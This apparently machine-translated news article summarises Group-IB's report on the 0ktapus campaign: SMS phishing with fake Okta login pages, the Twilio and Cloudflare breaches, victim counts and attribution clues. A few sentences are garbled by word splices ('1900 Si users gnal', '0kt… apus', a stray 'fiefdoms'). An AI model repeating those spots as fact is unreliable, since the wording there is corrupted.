Group-IB specialists have published a detailed report on the 0ktapus campaign. Experts said the recent phishing attacks against Twilio and Cloudflare employees were part of this massive campaign, which resulted in 9,931 accounts compromised at more than 130 companies.
Let me remind you that the Twilio hack occurred in early August 2022. Then it turned out that unknown attackers organized a phishing attack on the company’s employees, stole their account data, and then used them to access information about some customers.
As it became known later, this incident affected 163 Twilio client companies, and soon Cloudflare, MailChimp and Klaviyo reported similar attacks. Moreover, the attacks began to develop further – due to the compromise of the listed companies, others also suffered. For example, the Signal messenger, which suffered due to the Twilio hack.
Also, according to media reports, among the targets of the hackers were Coinbase, KuCoin, Binance, Microsoft, Telus, Verizon Wireless, T-Mobile, AT&T, Sprint, Rogers, Mailgun, Slack, Box, SendGrid, Yahoo, Sykes, BestBuy and Infosys.
As Group-IB analysts said, in general, there were much more victims, and the 0ktapus campaign has been active since at least March 2022. The main goal of this campaign was to steal Okta’s identities and two-factor authentication (2FA) codes to carry out subsequent attacks on the supply chain. The report states that the vast majority of 0ktapus victims are located in the US, and many of them use Okta’s identity management and access control services.
As early as July 26, 2022, the Group-IB team received a request from a client asking for more information about a recent phishing attempt targeting its employees. The investigation revealed that these phishing attacks, as well as the Twilio and Cloudflare incidents, were links in the same chain – a simple but highly effective phishing campaign of unprecedented scope and scope. Worse, the disclosure of 1900 Si users gnal clearly showed that when attackers compromised one organization, they could quickly move on to subsequent attacks on the supply chain.
“While the attackers may have been lucky in these attacks, it is much more likely that they carefully crafted this phishing campaign to launch sophisticated attacks against the supply chain. It is not yet clear whether the “penetrating” attacks were planned in advance or whether opportunistic actions were taken at each stage. Regardless, the 0ktapus campaign has been incredibly successful and its full scope may not be clear for some time to come,” says Robert Martinez, Senior Threat Intelligence Analyst at Group-IB.
As noted above, the main goal of the attackers was to obtain credentials for Okta and 2FA codes for employees of target organizations. Victims of the hackers received text messages containing links to phishing sites imitating the Okta authentication page for their organization.
At the same time, it is still unknown how the hackers compiled a list of targets and how they learned the phone numbers of target employees. However, according to Group-IB, the attackers launched a campaign targeting mobile operators and telecommunications companies. This was probably done as part of the preparation and data collection.
In total, the researchers found 169 unique phishing domains involved in 0ktapus. The domains used keywords such as “SSO”, “VPN”, “OKTA”, “MFA”, and “HELP”. From the victim’s point of view, the phishing sites looked convincing and looked like the legitimate authentication page they were used to using. It is noted that all sites were created using the same phishing kit, previously unknown to experts.
In the course of studying the code of this phishing kit, analysts found strings related to the configuration of the bot in Telegram, as well as the channel that the hackers used to collect compromised data. Thanks to this, the researchers were able to analyze the data obtained by the attackers. fiefdoms since March 2022.
In total, the hackers managed to steal the credentials of 9931 users, including 3129 email records and 5441 records with multi-factor authentication codes. Since two-thirds of the records did not contain corporate email, but only usernames and 2FA codes, the researchers were able to determine only the regions where the victims lived: out of 136 companies attacked, 114 are located in the United States.
Most of the victims are related to IT, software development and cloud services, but the attackers were also interested in cryptocurrency projects and firms involved in finance and recruiting.
Telegram allowed experts to get some information about the channel that was used along with the phishing kit, such as its name, as well as details of the users who administer it.
Thus, it turned out that the second administrator of the channel in question is hiding under the nickname “X”. The researchers say they used the Group-IB Threat Intelligence system to identify one of X’s 2019 posts, which eventually led to his Twitter account. The same tool helped to find out the first and last name of the channel administrator. A Twitter username search did turn up a GitHub account that contained the same username and profile picture. As a result, analysts came to the conclusion that “X” is located in North Carolina, USA.
“The methods used by these attackers are not out of the ordinary, but the planning and how they moved from one company to another makes this campaign worthy of attention. 0ktapus shows how vulnerable modern organizations are to attacks built on basic social engineering, and how far-reaching the consequences of such incidents for their partners and clients can be,” sums up Rustam Mirkasymov, Head of Cyber Threat Research at Group-IB Europe.
It must be said that after the publication of the Group-IB report, new victims of 0kt declared themselves apus, thus fully confirming the gloomy forecasts of experts. So, it became known that three companies at once suffered from hacker attacks and leaked data: